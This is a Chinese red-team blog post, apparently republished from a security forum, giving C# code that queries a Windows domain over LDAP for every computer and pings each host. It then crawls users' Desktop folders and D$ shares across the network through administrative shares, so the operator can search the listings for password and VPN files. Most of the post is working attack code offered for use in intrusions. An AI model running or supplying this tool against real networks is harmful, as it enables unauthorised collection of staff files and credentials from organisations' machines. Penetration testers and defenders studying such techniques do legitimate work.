域内批量获取敏感文件
2022-9-9 08:2:45 Author: 红队蓝军(查看原文) 阅读量:20 收藏

文章首发先知社区:https://xz.aliyun.com/t/11667

域内批量获取敏感文件

域内如果我们要获取指定机器,恰巧那台机器为linux只开了22等端口或者说无法从常规web打点进入,我们可以寻找运维机器的密码本,一台一台翻的话成本太高,就可以通过批量获取域内桌面文件。

0x01 批量获取域内机器名

自动化工具,当然就要全自动,懒人必备。net group "domain computers" /do ,获取机器是3个一排,然后可以通过正则删除空格,每次也麻烦,直接获取机器名更加方便。

思路就是连接ldap然后指定过滤条件(&(objectclass=computer))获取机器。

获取域内机器

public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;
url = "LDAP://" + ip; 
username = domain user;
password = domain pass;
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))
 foreach (SearchResult r in Ldapcoon.search.FindAll())
 {
     string computername = "
";
     computername = r.Properties["
cn"][0].ToString();
     Console.WriteLine(computername);
 }

0x02 机器探测存活

1.把上述机器放入machine.txt内,然后逐行读取

StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
    string machine = machine_name.ReadLine();
    Console.WriteLine(machine);
}

2.探测探测存活,这里面向谷歌

 public static bool IsMachineUp(string hostName)
        {
            bool retVal = false;
            try
            {
                Ping pingSender = new Ping();
                PingOptions options = new PingOptions();
                // Use the default Ttl value which is 128,
                // but change the fragmentation behavior.
                options.DontFragment = true;
                // Create a buffer of 32 bytes of data to be transmitted.
                string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
                byte[] buffer = Encoding.ASCII.GetBytes(data);
                int timeout = 800;

                PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
                if (reply.Status == IPStatus.Success)
                {
                    retVal = true;
                }
            }
            catch (Exception ex)
            {
                retVal = false;
                //Console.ForegroundColor = ConsoleColor.Red;
                //Console.WriteLine("[-]" + ex.Message);
                //Console.ForegroundColor = ConsoleColor.White;
            }
            return retVal;
        }

一般来说it机器都为工作机而非服务器,可能存在下班关机等情况,如果大多机器处于关机情况下,就会浪费比较多的时间,所以优先判断存活是很有必要的。

StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
    try
    {
        string machine = machine_name.ReadLine();
        if (IsMachineUp(machine))
     {
      //操作
     }
    }
    catch { }
}

0x03 获取桌面文件

我们这里构造获取结果目录呈现结果为:

TargetDesktopinfos
    机器1
        用户A
            文件
        用户B
            文件
    机器2
        用户C
            文件
        用户D
            文件

首先获取当前路径创建TargetDesktopinfos目录。

string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);

然后获取目标机器c:\users\目录,如果存在该目录创建机器名

string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
    string MachineFolder = DesktopFiles + "\\" + machine;
    Directory.CreateDirectory(MachineFolder);

再遍历users目录存在哪些用户,同理如果存在desktop目录创建用户名和desktop.txt。

string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();

接下来就是遍历desktop目录所有文件以及文件夹内的文件。

这里用到Directory.GetFileSystemEntries方法

public static string[] GetFileSystemEntries (string path, string searchPattern, System.IO.SearchOption searchOption);
第一个参数path:要搜索的路径。

第二个参数searchPattern:要与 `path` 中的文件和目录的名称匹配的搜索字符串。

第三个参数searchOption,指定搜索操作是应仅包含当前目录还是应包含所有子目录的枚举值之一。

这里的SearchOption.AllDirectories我们使用SearchOption.AllDirectories,表示在搜索操作中包括当前目录和所有它的子目录。

完整代码如下

try
            {
                string DesktopFiles = "";
                //获取机器名
                StreamReader machine_name = new StreamReader(@"machine.txt");
                while (!machine_name.EndOfStream)
                {
                    try
                    {
                        string machine = machine_name.ReadLine();
                        if (IsMachineUp(machine))
                        {
                            //获取当前路径
                            string currentpath = Directory.GetCurrentDirectory();
                            DesktopFiles = currentpath + "\\TargetDesktopinfos";
                            Directory.CreateDirectory(DesktopFiles);
                            Console.WriteLine("[*]" + machine);
                            //获取users目录
                            string userpath = @"\\" + machine + @"\c$\users";
                            var user_list = Directory.EnumerateDirectories(userpath);
                            if (Directory.Exists(userpath))
                            {
                                //创建机器名文件夹
                                string MachineFolder = DesktopFiles + "\\" + machine;
                                Directory.CreateDirectory(MachineFolder);
                                foreach (string user in user_list)
                                {
                                    string DesktopDirectoryPath = user + "\\desktop";
                                    string username = substring(user);
                                    if (Directory.Exists(DesktopDirectoryPath))
                                    {
                                        //创建用户名文件夹
                                        string UserFolder = MachineFolder + "\\" + username;
                                        Directory.CreateDirectory(UserFolder);
                                        //创建desktop.txt文件
                                        string Desktoptxt = UserFolder + "\\desktop.txt";
                                        StreamWriter sw = File.CreateText(Desktoptxt);
                                        sw.Close();

                                        string info_user = substring(user);
                                        Console.ForegroundColor = ConsoleColor.Green;
                                        Console.WriteLine("[*]" + info_user);
                                        Console.ForegroundColor = ConsoleColor.White;

                                        string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);

                                        foreach (string file in AllFiles)
                                        {
                                            Console.WriteLine(file);
                                            string create_time = Directory.GetCreationTime(file).ToString();
                                            string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
                                            File.AppendAllText(Desktoptxt, writeFileTo);
                                        }
                                    }
                                    else
                                    {
                                        continue;
                                    }
                                }
                            }
                        }
                        else
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("[-]" + machine + " is down");
                            Console.ForegroundColor = ConsoleColor.White;
                        }
                    }
                    catch (System.Exception ex)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("[-] error");
                        Console.WriteLine("[-] Exception: " + ex.Message);
                        Console.ForegroundColor = ConsoleColor.White;
                        continue;
                    }
                }
                machine_name.Close();
                Console.WriteLine("[+]out put to:" + DesktopFiles);
            }
            catch (System.Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[-] error");
                Console.WriteLine("[-] Exception: " + ex.Message);
                Console.ForegroundColor = ConsoleColor.White;
                return;
            }

同理要获取DEF盘,这里就举例D盘

public static void D()
        {
            try
            {
                string DFiles = "";
                StreamReader machine_name = new StreamReader(@"machine.txt");
                while (!machine_name.EndOfStream)
                {
                    try
                    {
                        string machine = machine_name.ReadLine();
                        if (IsMachineUp(machine))
                        {
                            string currentpath = Directory.GetCurrentDirectory();
                            DFiles = currentpath + "\\DInfos";
                            Directory.CreateDirectory(DFiles);

                            Console.ForegroundColor = ConsoleColor.Yellow;
                            Console.WriteLine("[*]" + machine);
                            Console.ForegroundColor = ConsoleColor.White;

                            //获取users目录
                            string dpath = @"\\" + machine + @"\d$";
                            var d_list = Directory.EnumerateDirectories(dpath);
                            if (Directory.Exists(dpath))
                            {
                                //创建机器名文件夹
                                string MachineFolder = DFiles + "\\" + machine;
                                Directory.CreateDirectory(MachineFolder);
                                //创建输出文本
                                string E_txt = MachineFolder + "\\dFiles.txt";
                                StreamWriter sw = File.CreateText(E_txt);
                                sw.Close();
                                try
                                {
                                    var files = Directory.GetFiles(dpath);
                                    foreach (string file in files)
                                    {
                                        Console.WriteLine(file);
                                        string create_time = Directory.GetCreationTime(file).ToString();
                                        string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
                                        File.AppendAllText(E_txt, writeFileTo);
                                    }

                                    var directorys = Directory.EnumerateDirectories(dpath);
                                    foreach (string directory in directorys)
                                    {
                                        if (!directory.Contains("System Volume Information"))
                                        {
                                            string[] AllFiles = Directory.GetFileSystemEntries(directory, "*", SearchOption.AllDirectories);
                                            foreach (string file in AllFiles)
                                            {
                                                string create_time = Directory.GetCreationTime(file).ToString();
                                                Console.WriteLine(file);
                                                string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
                                                File.AppendAllText(E_txt, writeFileTo);
                                            }
                                        }
                                    }
                                }
                                catch (UnauthorizedAccessException ex)
                                {
                                    Console.ForegroundColor = ConsoleColor.Red;
                                    Console.WriteLine(ex.Message);
                                    Console.ForegroundColor = ConsoleColor.White;
                                    //goto cc;
                                }

                            }
                        }
                    }
                    catch (System.Exception ex)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("[-] 不存在D盘");
                        Console.WriteLine(ex.Message);
                        Console.ForegroundColor = ConsoleColor.White;
                        continue;
                    }
                }
                machine_name.Close();
                Console.WriteLine("[+]out put to:" + DFiles);
            }
            catch (System.Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[-] error");
                Console.WriteLine("[-] Exception: " + ex.Message);
                Console.ForegroundColor = ConsoleColor.White;
                return;
            }
        }

这里我们在08这台域机器桌面存放文件

测试效

结果呈现

接下来直接文件夹搜索password或者vpn等关键字即可。

加下方wx,拉你一起进群学习

往期推荐

域内批量解析chrome浏览器

什么?你还不会webshell免杀?(五)

net反射

firefox批量get password

Demo版菜刀

什么?你还不会webshell免杀?(四)

什么?你还不会webshell免杀?(三)

记一次内部红队渗透——定位张三


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY2MTQ1OQ==&mid=2247502357&idx=1&sn=afe9aa38b2386df73b8ac31c1f2a2c3b&chksm=ce6770a9f910f9bf3248d60a71cac48d58837c117fb96cc56007e12d46f698ed82f94936b36a#rd
如有侵权请联系:admin#unsafe.sh